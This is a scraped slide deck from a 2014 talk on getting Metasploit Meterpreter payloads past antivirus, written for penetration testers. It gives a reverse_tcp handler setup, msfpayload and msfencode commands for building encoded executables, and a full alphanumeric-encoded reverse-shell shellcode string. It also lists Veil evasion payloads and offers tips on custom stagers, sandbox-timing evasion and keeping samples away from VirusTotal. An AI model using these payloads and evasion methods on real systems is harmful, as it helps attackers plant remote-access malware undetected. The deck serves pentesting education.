2600 av evasion_deuce


Published on

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

2600 av evasion_deuce

  1. 1. Anti-Virus Evasion Deuce January 3, 2014 Joe Testa
  2. 2. Anti-Virus Got Better     Last January I gave a talk on AV evasion. I showed how to craft a custom Meterpreter payload. Some AV products catch that now! This presentation shows how to get back in business.
  3. 3. Anti-Virus Got Better    A lot of built-in exploits don't work anymore because of AV. You now have to re-write exploits yourself. Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module.  Without AV, you normally get SYSTEM or root.  With AV, you get disappointment.
  4. 4. Goals    Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering. Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked. You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc?
  5. 5. Payload Overview    Usually, the EXE doesn't contain Meterpreter itself. Its a stager, whose only job is to connect back to your Metasploit server and execute what it returns. For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them.
  6. 6. Payload Server  The server is set up with: msf > use exploit/multi/handler msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on [*] Starting the payload handler...
  7. 7. IDS/IPS Evasion   An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network. One way is to set StageEncoder on the server.    You can use shikata_ga_nai, etc. Last I checked, this is very slow! Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload.  You set the RC4 key to encrypt communications.
  8. 8. Simple Payloads  The most basic way to create an EXE is like this: $ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 X > payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"", "LPORT"=>"443"} $ ls -l payload.exe -rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe $ file payload.exe payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
  9. 9. Simple Payloads  Up until August 2011, you could bypass AV by encoding like so: $ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7) [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8) [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
  10. 10. Simple Payloads  Last year I talked about shellcodeexec.   https://github.com/inquisb/shellcodeexec The punchline is that it takes alphanumericencoded shellcode, stuffs it into memory, and executes it: C:Documents and Settingsroot>sce.exe PYIIIIIIIIIIIIIIII7Q ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc 1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT 45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV 9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p
  11. 11. Formerly Good Payload  Here's how the alphanumeric shellcode is created: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX [*] x86/alpha_mixed succeeded with size 634 (iteration=1) PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1 yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0 Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA
  12. 12. Formerly Good Payload  Microsoft Security Essentials catches this!
  13. 13. Better Payloads  There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python.    Creates a writeable and executable memory buffer, stuffs code into it, executes it. You use pyinstaller (http://www.pyinstaller.org/) to create an EXE. Available at: https://www.trustedsec.com/files/pyinjector.zip
  14. 14. Better Payloads  There is a tool called Hyperion which encrypts an EXE with AES-128.   The output EXE brute-forces part of the key on startup.   http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip This prevents AV from extracting the key and decrypting the binary. The stub code for decryption is static!  It is open source though...
  15. 15. Best Payloads  The Veil project is a toolkit for creating payloads that evade AV.    https://www.veil-evasion.com/ It is a relatively new project, but is actively maintained and developed. Currently has 22 payloads.
  16. 16. Best Payloads Current Veil payloads: c/meterpreter/rev_tcp c/meterpreter/rev_tcp_service c/shellcode_inject/virtual c/shellcode_inject/void cs/meterpreter/rev_tcp cs/shellcode_inject/base64_substitution cs/shellcode_inject/virtual native/Hyperion native/backdoor_factory native/pe_scrambler powershell/shellcode_inject/download_virtual powershell/shellcode_inject/psexec_virtual powershell/shellcode_inject/virtual python/meterpreter/rev_http_contained python/meterpreter/rev_https_contained python/meterpreter/rev_tcp python/shellcode_inject/aes_encrypt python/shellcode_inject/arc_encrypt python/shellcode_inject/base64_substitution python/shellcode_inject/des_encrypt python/shellcode_inject/flat python/shellcode_inject/letter_substitution
  17. 17. Best Payloads  Veil and others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion.    This is the same problem that Metasploit has. Nothing beats writing something yourself! Best method is to take what's out there, customize it, and keep it private.
  18. 18. Best Payloads   A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager. With shellcodeexec, the idea was to launch the generated stager to connect to the server, download Meterpreter, and execute it.   shellcodeexec → alphanumeric-encoded stager → Meterpreter Why not write your own stager from scratch?
  19. 19. Best Payloads  Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent.    https://github.com/rsmudge/metasploit-loader Basically, you open a TCP connection to the Metasploit server, throw the bytes returned into an executable buffer. Prepend the buffer with a ”mov edi, socket_id” instruction, and jump to it.  Meterpreter will then use the existing TCP session.
  20. 20. Best Payloads    How do you customize it? One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds. Do innocent things like read the registry, read some config files, compute digits of pi, etc.  Don't sleep to run down the clock!
  21. 21. VirusTotal   VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products. Its common knowledge that they pass on samples to AV vendors.   They know malware authors use it. Your target can pull down a signature in as little as one hour.
  22. 22. VirusTotal  vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal's API to check the SHA-1 hash of your payload.   If you don't get your own API key, it uses a built-in one.   Its been incorporated into Veil. This probably tips them off that its malware! Actually... this functionality as a whole was probably designed as a trap!
  23. 23. Building an AV Lab    The best way to check your payload is by building your own AV lab. VirusTotal has 46 products, but how many corporate environments use ”Kingsoft AV”? Symantec and McAfee seem to have the overwhelming market share.  Maybe throw in Kaspersky for good measure too...
  24. 24. Building an AV Lab   MSDN Operating Systems subscription is $700 for 1 year. Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint.  McAfee SaaS Endpoint Protection costs $52.  Make sure the AV products don't phone home!
  25. 25. Building an AV Lab    I'm now actively building this lab. Once its set up, I'm going to evaluate all these evasion tools. If anyone wants to test some payloads, just let me know!
  26. 26. Conclusion    To be a good pentester, you need to know how to bypass AV. Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives. The success of your engagement can entirely depend upon how well you can adapt.  Being a programmer is extremely valuable!